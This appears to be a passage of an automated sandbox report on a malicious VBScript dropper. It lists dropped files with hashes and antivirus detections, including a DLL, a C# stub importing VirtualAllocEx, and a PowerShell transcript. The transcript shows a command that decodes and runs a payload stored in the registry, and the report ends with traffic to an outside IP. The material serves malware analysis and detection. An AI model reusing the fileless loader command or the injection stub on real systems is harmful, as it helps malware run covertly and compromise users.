Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...5.b.2.b.n.k.l.d...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...5.b.2.b.n.k.l.d...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\Bonaparte.zip Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	Zip archive data, at least v2.0 to extract
Category:	dropped
Size (bytes):	41938
Entropy (8bit):	7.989242204320437
Encrypted:	false
SSDEEP:	768:gAmgadYntvl1KeeHgh7gfGUeVRn5XotJMhv5Mmg0imtI9v0IN7l:g7uTCCEMakKmhIM2
MD5:	C88641703830B3DF0E04A2CF3B9497ED
SHA1:	F46E2FE6F66C94DBB6A2D31F7E3D63586B2A0B71
SHA-256:	B138293D0EA58C51021F2BA5355D8215323189AAFB486B62315513C41B39E1F0
SHA-512:	A67053E99FF0F06F3575191A4A9B4976832DE7D7EFB3E9652935E32130830E6EEF340BF044477DC061E49D588960D2792B3A93CDACA1E329E8012228845DD96D
Malicious:	true
Preview:	PK........j.tQR.N.............marginal.roq..TS].0L...A....tA....T!.AD@.."%....:..J..H..D)..n.E.wB.w...e.../k.....^.{.....M.i.ECKCC.@...Rih.......?^....9@S...[E.A...v.wxb.`.........C..g;.k;.%.[<...?...r./...44...4R.....7As.....IC.&U.n......k....4..-^.}_..-.....o....>r}44.....44........sz............1.37q2...e.o.T.@......M....GO...:.V..S..r.FO...G.\|..0..S'. ;.p..t....f......3..q....N.GsK_..."X.....0.`....F-..T.Z..q(..y..F..<.......z.O......G.F.....a...9.y_.&,......;......`.V..}.........a<..2gr..cg....S.E.....rWTN..wP...x.2...s........ID......k.,t...'.....]#..QZ.....['...P...\].&...Rk1.]..{....... ....4...#g}kc.E...)~H.n......d.O.gl...........@R....@N...>...&G.....%.d...pcv`....j.V.._..VS..j.+.N....+.`.F(&-..S.+*..7U.P.?:..3..=).........x.....6.. ..x...._t.........?....C...FW......R\|.J......D.<~..1.A...u.Rx#.j........Oy G...x.....}.S..?.S...p..L.>R>.....B....Q...?z..d:......KI,......8.3........e....G..W..f .wf.D.`..2.8YZ...OX....m..?..E.

C:\Users\user\AppData\Local\Temp\Hettie.jpeg Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	38
Entropy (8bit):	4.807009421281392
Encrypted:	false
SSDEEP:	3:Nv6nZ+KE8cOjG:Nv6Z+Kg
MD5:	32E2B9D667BCFB4FDFDF0D054EAC8755
SHA1:	2AB5BB87549657D68E3FDD4B159972FAA26FF752
SHA-256:	46BEB9B153848A5A6506AC907E35CFA8771AACDA08DCDAFA38A351C053394E96
SHA-512:	531098616D3E159CFD0A833ED88CABA2C15F124F5CA155AAE0E5D12747EE9B9E2A916E4CC88A804EE8F51E0F8888F368425B80A30DCA35F79FB0FC3B3B83B90F
Malicious:	false
Preview:	iIFNJmSCDlBhMcCeQbfSIOjtxZUzZYWjkFdZfq

C:\Users\user\AppData\Local\Temp\JavaDeployReg.log Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	89
Entropy (8bit):	4.242855375782486
Encrypted:	false
SSDEEP:	3:oVXVPWOfUuUIIi8JOGXnFPWOfUuUIINLX+n:o9IO8WqYO89u
MD5:	0C16B14B295FA31635B2CF0D5608C6CF
SHA1:	42E59548F86E0A6E14852FE1054DF70FBBFAA634
SHA-256:	624F55C5EE27550C4A9DB0730268EFB7C344328503B83CABDE307FBDFC1DB8A6
SHA-512:	1C836340CC9ECE69ED474AB13C87434763388A2591E3348B364B56598E539B638B3DEC0645F92575685414C9DD487C41B7BBCBF37BF2BBCDD3F966D36D7A44E9
Malicious:	false
Preview:	[2020/11/23 12:19:18.230] Latest deploy version: ..[2020/11/23 12:19:18.230] 11.211.2 ..

C:\Users\user\AppData\Local\Temp\RES16AC.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	data
Category:	dropped
Size (bytes):	2184
Entropy (8bit):	2.7054796719836367
Encrypted:	false
SSDEEP:	24:p+fk/DfHehKdNNI+ycuZhNwakS8PNnq9qpee9Ep:ckrUKd31ulwa3sq9J
MD5:	1B9AFA76FC15BF543147D557EE80F010
SHA1:	B7DD435D5295FED0DC2D8F10CFD253B38B76F527
SHA-256:	5BDD2A24E013CBCFDCB38BA23F2126F69052DA3E4A0BF5BF352072B39F72100C
SHA-512:	E143E970FC5FF10CF3523C6B6775B1B380DB5160252CD02D353EBFA0D172EBB66D49DD92DE1384F5CC506DA2E2B9110C10261DA05668EC4989E230B18083CAF7
Malicious:	false
Preview:	........T....c:\Users\user\AppData\Local\Temp\ztp4fhzn\CSC901590E0DE33494E82C695FA40AE49BE.TMP................'@-.j...O....)H..........4.......C:\Users\user\AppData\Local\Temp\RES16AC.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\RES269.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	data
Category:	dropped
Size (bytes):	2184
Entropy (8bit):	2.703220305924983
Encrypted:	false
SSDEEP:	24:bZfqiG0snfHghKdNfI+ycuZhN+/akSx4PNnq9qpJ6e9Ep:bBqiVsfiKd91ulWa3Cq9T
MD5:	621B3DC6A58CB8EBF6602E924A0D27CE
SHA1:	2801A81290D7389CBD078852A82DA94F093CDF00
SHA-256:	25E75007CCFC26B2C838A1A8C05D87CED9AF9475A9B0097B39F0B2DA2AD94C24
SHA-512:	BF3985DFF0C6E52A794CA9ECA0D36629B32895A31774B4BD646A12E79C2195522D191739B058E326523F20DF3A4A803F0E00ED5A2209CC069A5B54E236A05842
Malicious:	false
Preview:	........S....c:\Users\user\AppData\Local\Temp\5b2bnkld\CSC18B8FCEB9D646308CD119582578A238.TMP................7.m.E}.R...m.{h..........3.......C:\Users\user\AppData\Local\Temp\RES269.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nqjlg1ip.3rs.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v3uhcgdk.pa4.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\adobe.url Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<https://adobe.com/>), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	108
Entropy (8bit):	4.699454908123665
Encrypted:	false
SSDEEP:	3:J25YdimVVG/VClAWPUyxAbABGQEZapfpgtovn:J254vVG/4xPpuFJQxHvn
MD5:	99D9EE4F5137B94435D9BF49726E3D7B
SHA1:	4AE65CB58C311B5D5D963334F1C30B0BD84AFC03
SHA-256:	F5BC6CF90B739E9C70B6EA13F5445B270D8F5906E199270E22A2F685D989211E
SHA-512:	7B8A65FE6574A80E26E4D7767610596FEEA1B5225C3E8C7E105C6AC83F5312399EDB4E3798C3AF4151BCA8EF84E3D07D1ED1C5440C8B66B2B8041408F0F2E4F0
Malicious:	false
Preview:	[{000214A0-0000-0000-C000-000000000046}]..Prop3=19,11..[InternetShortcut]..IDList=..URL=https://adobe.com/..

C:\Users\user\AppData\Local\Temp\hemp.mp4 Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	21
Entropy (8bit):	4.201841232302569
Encrypted:	false
SSDEEP:	3:aTQDBrppxBn:eAF
MD5:	BAFCF6766D3A528987DA71E786B3211E
SHA1:	42061CFFE74471DE81D6E0F9C2AB09C396F1EE96
SHA-256:	B79049E087BD746D519AEBC12B42B0213CE5220D5252076AB9AB2CD988B0BB76
SHA-512:	1AC783355FD08DFFF52B0A126E323908C7C5BFDC5D6907108ACA1B78F4D7168156852C3548896C6BB05BAEFA1F02AC4695BA222C6C485B0B8B8983ABE4485481
Malicious:	false
Preview:	hcYRMguufkKzEvALiMSsd

C:\Users\user\AppData\Local\Temp\marginal.roq Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	48128
Entropy (8bit):	7.669222450158645
Encrypted:	false
SSDEEP:	768:g3onFH7sWxJPhIsa5n5XotJMhv5Mmg0imbr6W:2oBwsmakKmh6W
MD5:	BA1A42AFC59951D161F62B6840D32D3D
SHA1:	EC7C3F94392C42762C8824D4EC899463F49C3756
SHA-256:	7B3B1C04013211B4E056D58004D62DC688F640D802596A69C0E10849FEE95BDD
SHA-512:	688EEC7892FE603C0DF6F8A2207CDF4A9EA3D9E922B309ACB1B6538C266680C3DF972250DDFABB03160F47F68369FF162D5BBDFFAC2BB3FCE94FF6BEA1789E14
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 69%
Preview:	MZ..............@.......@...............................................!..L.!This program cannot be run in DOS mode...$........PE..L...8p._...........!...I..................... ....@.................................H1....@.................................@...X....................................................................................................................text............................... ..`.data........ ......................@....reloc..............................@..B................U..}..u..*.............}..u.1....}..u.1....}..u.1.....SWV..v.h.............^_[.1.H)...v.u..j@h.0..h@...j.....@.Sh@...h. @.P......U..`.}..u..M..U..0......a.........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\reactionary.thm Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	70
Entropy (8bit):	5.091723152900814
Encrypted:	false
SSDEEP:	3:uikdpKz4dutoA+p/h03n:uNvd1NrO
MD5:	6C3B412B4826477EC990E994DEAE1B14
SHA1:	91BBB9F31680A6AA62FADC94E85103FC97506699
SHA-256:	056F5C6328282782230B1096965CE229E5D7B9A27BEE62ABD11F9E487A98721B
SHA-512:	D9FAA251A8AC338F098B83CBECCB369C74739DE3B1BB779343874E1A4245870FF8A6268EA138E5DE6F3272C49E5E1E2B1FA9F48037D5AF71C496A010A3187FCA
Malicious:	false
Preview:	IjebRqKdWLOYanJbVFtMKQIwYTSuiTMsZtBOnbvGjeIjOiaVuAEWzOmGOyqdZqLXUYbDQR

C:\Users\user\AppData\Local\Temp\ztp4fhzn\CSC901590E0DE33494E82C695FA40AE49BE.TMP Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.098274781959774
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry+ak7Ynqq8PN5Dlq5J:+RI+ycuZhNwakS8PNnqX
MD5:	CB27402D1C6ABBCE144FDB0CD4EF2948
SHA1:	9A5AAE79EF9B19645DDB1DE161ACBF0ECD50CF29
SHA-256:	5073BCE2D884173E0A85387183E4354DD6EB80EF56351FF88A545D3C2022454E
SHA-512:	0F946636E1B3F5548FF0FCFA9BDD16948FF2AD04CD9F8D4D6FD9C2A29358CF127D8901A55D13C7D175BDA537A3DFCB644CA0553235AD4B3C80675D6D343ABD7D
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...z.t.p.4.f.h.z.n...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...z.t.p.4.f.h.z.n...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	414
Entropy (8bit):	5.000775845755204
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJ0VMRSRa+eNMjSSRr5DyBSRHq10iwHRfKFKDDVWQy:V/DTLDfue9eg5r5Xu0zH5rgQy
MD5:	216105852331C904BA5D540DE538DD4E
SHA1:	EE80274EBF645987E942277F7E0DE23B51011752
SHA-256:	408944434D89B94CE4EB33DD507CA4E0283419FA39E016A5E26F2C827825DDCC
SHA-512:	602208E375BCD655A21B2FC471C44892E26CA5BE9208B7C8EB431E27D3AAE5079A98DFFE3884A7FF9E46B24FFFC0F696CD468F09E57008A5EB5E8C4C93410B41
Malicious:	true
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class mme. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint bxtqajkpwb,uint ytemv);.[DllImport("kernel32")].public static extern IntPtr VirtualAllocEx(IntPtr nlosdxjodm,IntPtr mvqodpevph,uint tnvcegcf,uint dbt,uint egycoak);.. }..}.

C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	369
Entropy (8bit):	5.249164487663631
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fkzxs7+AEszIwkn23fh:p37Lvkmb6KRfcWZEif5
MD5:	19E6C58CD10622C223144C18D9BD35AD
SHA1:	352924FA43AC485C669CD7E54A008CDB708272F8
SHA-256:	13C633BCAE4EEADC8CA432DB095A694CFAC931E8A1B5C942905BBE43F90112B4
SHA-512:	A397EB4BF7961B5E0FB7A56233084ED35AF540639AE48353EBD37DC8AE48F49DE6403C37B68C2FA036EB17C486014AEC178BEBB3DB55D6F0D0BAEBC25A9B7291
Malicious:	false
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.0.cs"

C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.dll Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.6342807860034836
Encrypted:	false
SSDEEP:	24:etGSCmM+WEei8MTx2qHtLUyBrfEOdWtGYwxhtkZfGdw7I+ycuZhNwakS8PNnq:6H7qMTxzJUyN8wWQYwSJGU1ulwa3sq
MD5:	A54DA3260FC8514F5DAC73481A8DA701
SHA1:	B3C3F2FC1BB943F736D8CA75C3E5DAD8C91053E1
SHA-256:	FECAE1DD2E993B609DE878972C0A0B221B449BFE75169E1BE288041D5325CBD8
SHA-512:	03B5B691606FE01A32F3C8503F6E3DE9C9D0EEF1AE14903F73AF147BEBAB5CF3B855C9F88CD06597E4B69E188C3C8FC8D473F965C32F98C40F92B1026A288DA4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...P...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...............'...................................... 6............ H............ P.....P ......_.........e.....p.....v..........................._.!..._...!._.&..._.......+.....4.:.....6.......H.......P..................................................<Module>.ztp4fhzn.dll.mme.W32.mscor

C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.out Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	412
Entropy (8bit):	4.871364761010112
Encrypted:	false
SSDEEP:	12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
MD5:	83B3C9D9190CE2C57B83EEE13A9719DF
SHA1:	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
SHA-256:	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
SHA-512:	0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
Malicious:	false
Preview:	Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\~DF135B9A8EB736BB66.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40217
Entropy (8bit):	0.6817838832405612
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+PxzaBAIxZidqIxZidNIxZid+:kBqoxKAuqR+PxzaBAIfidqIfidNIfid+
MD5:	9CC706710702B84C06553BA57F390C7F
SHA1:	AED5AAA95744981B18B99676823B0CEACCEDF11D
SHA-256:	B2A1D1E9BB463F0E38265F734C87D1607AE222B1108CE9DBCE9DB76E5B0F7E1E
SHA-512:	FCF9F93D1E725ED260FEC899BA0574CBB2149AF309D8C8D450D1DD722157736EEF5303E9F39DD003836EBDBC920265CC684B2700B7A68D2972F9BFE4A8E480A0
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF6A31E5743615C572.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40097
Entropy (8bit):	0.6616799121677559
Encrypted:	false
SSDEEP:	384:kBqoxKAuqR+RMRqRwRRRaRLDquORDquOGDquOD:TOzOOOD
MD5:	7C779D1260CB993D38A34A8088F3C1C0
SHA1:	729615B377B51EDF7988DB881A2E2FDA56C6B589
SHA-256:	9B976D794ADC110663D49510BCB748486DD5593E2CF5691DF97C6AADB00825A5
SHA-512:	D958904C0F519BCD35E9818E2CC0E4416EB1B23E72BF2CCEE3E1A773FF25CA50362E6C22411F89FAC81FDE0D54BC20DF3AC3C7EF963D9D65E030B848161AA723
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFCF3528861E95EDFF.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40225
Entropy (8bit):	0.6850646467025453
Encrypted:	false
SSDEEP:	192:kBqoxKAuqR+a8mv85cQPtrYxccQPtrYxzcQPtrYxc:kBqoxKAuqR+a8mv85TG+TG1TG2
MD5:	2D4FFE2929BF72627AB91C46A7CA726B
SHA1:	CE64983337FEBC66521F426DFAABBBEB5E9CB6C4
SHA-256:	D3CAE943046FF1F70EDE93347D0246B7ED0CC362C305C0117F565B88BB9C1392
SHA-512:	31AB0ED051FA8376E8A4DB88B3F04D90747AE1F4DA1E307AF81292D93A923C02A0F803CA1C05D5B757A41F4AFC523CD9B22E9C1B7D30A05C700D484EFD83FD98
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFD243D1994B0C4AD0.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	13269
Entropy (8bit):	0.6169692188834844
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9loBa9loBK9lWBNnuOPCPn2PaOPBFGBFDOPG6LOPGr6:kBqoIBFBzBNnp0nQFBFGBFkG6MGr6
MD5:	C635986B886BC083D868596BE7CE04AF
SHA1:	7697F9B81DA572770006C23C364AD4ECB43A5B23
SHA-256:	582418B578765DA8C4621830BEBC34768C4A0A970165517C5C786E82588E5033
SHA-512:	805300C96E16C7C35420CF04EBB2A952650248BC1E04A673F971C6DE8FEA051F494EEEA382CCAC6A9D8271F61CD45C573CEF965CB78CBB9A2F14C6E39431C229
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\{FC666F93-2B96-8EB5-95F0-8FA2992433F6} Download File
Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	54
Entropy (8bit):	4.058116152062723
Encrypted:	false
SSDEEP:	3:8RnuXfUZ9VdHddBWD1UEPv:ynuXo9oDeEX
MD5:	3949EEE2009C71A43575CD33CD1525DF
SHA1:	BA6313E7C1B9A1BAEFDE1FD5B432B6BAE4378B52
SHA-256:	D1C7689CD54334F98BFD15BFD71C9C1E8BDEA8AD9243F67F769771D113F1F8EA
SHA-512:	44336F22012607FE96E4F83ED4CE1EB946532203BDF6D57CF98F7608BCA2A8C30D275BBC4ED04DD378BE77615EC438AB77979A78675F82FBAA6F9341E601A3E8
Malicious:	false
Preview:	23-11-2020 12:20:16 \| "0xb88d3fdf_5fa2c4f12d12f" \| 1..

C:\Users\user\Documents\20201123\PowerShell_transcript.405464.YiUpPuBI.20201123121927.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1189
Entropy (8bit):	5.318252879290044
Encrypted:	false
SSDEEP:	24:BxSA87vBZMex2DOXUWOLCHGIYBtLWCHjeTKKjX4CIym1ZJXiOLCHGIYBtZGnxSAf:BZavjMeoORF/CqDYB1ZAFHZZZ
MD5:	6AE60B6CC94E67330266DFB6210EFCFD
SHA1:	AA9B2E73DEAF83105D2FDD90317B6DA191747262
SHA-256:	2BCEAB5A8C9213B4653D609BDC137EF7B5CC98AEC54A032265A1DFF28B7D5A05
SHA-512:	2BADE15D8FF36CAB4D3873692CBE3F555A1B816C95DC8AA85BAEB49F5DF7969C1301AED5F7F84734F559132283C9DD3053E4AE87FC5D0562BD841157FAADFB23
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20201123121928..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 405464 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).basebapi))..Process ID: 4604..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20201123121928..******************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).basebapi))..********************..

\Device\ConDrv Download File
Process:	C:\Windows\System32\nslookup.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	28
Entropy (8bit):	4.039148671903071
Encrypted:	false
SSDEEP:	3:U+6QlBxAN:U+7BW
MD5:	D796BA3AE0C072AA0E189083C7E8C308
SHA1:	ABB1B68758B9C2BF43018A4AEAE2F2E72B626482
SHA-256:	EF17537B7CAAB3B16493F11A099F3192D5DCD911C1E8DF0F68FE4AB6531FB43E
SHA-512:	BF497C5ACF74DE2446834E93900E92EC021FC03A7F1D3BF7453024266349CCE39C5193E64ACBBD41E3A037473A9DB6B2499540304EAD51E002EF3B747748BF36
Malicious:	false
Preview:	Non-authoritative answer:...

Static File Info

General
File type:	ASCII text, with very long lines, with CRLF, LF line terminators
Entropy (8bit):	5.264322263325788
TrID:
File name:	2Q4tLHa5wbO1.vbs
File size:	376718
MD5:	afa1319ab7c53ec14f6e2b5b403d4d08
SHA1:	1081298acf917fed6ed090c3d5ed642eef9e0f34
SHA256:	7eb2fa04c617f7c2adcfe5f2f6d0fef4dc20d89c30e06158ee1bcb94e5c128a2
SHA512:	796915943ea709ea0234911252b4eee6aa15a74709629f2749e397dc3cab70b11996714ab4b2d728d6d8931e83ef5a58b62938f6e62d02d254a5c71d1d4e93a0
SSDEEP:	6144:EkksIhqrBIWUpltI+iy2USFBqdNqpqximcH0d1gMGz:HrBz7
File Content Preview:	' kinky laundry Danbury wave revving caret Richard Muzo Erato oligoclase march corroboree took halfback Nevada biz octile caddis skyway bimetallic, Titan Tanganyika peccary downy, 1819897 flow escort, 1161344 ONeill bray banquet chenille ploy arteriolos

File Icon


Icon Hash:	e8d69ece869a9ec4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 23, 2020 12:19:07.961834908 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:07.961854935 CET	49733	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:08.222829103 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:08.223010063 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:08.224163055 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:08.239618063 CET	80	49733	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:08.239754915 CET	49733	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:08.525428057 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.288871050 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.288896084 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.288908958 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.288919926 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.288933039 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.288944960 CET	80	49732	47.241.19.44	192.168.2.4
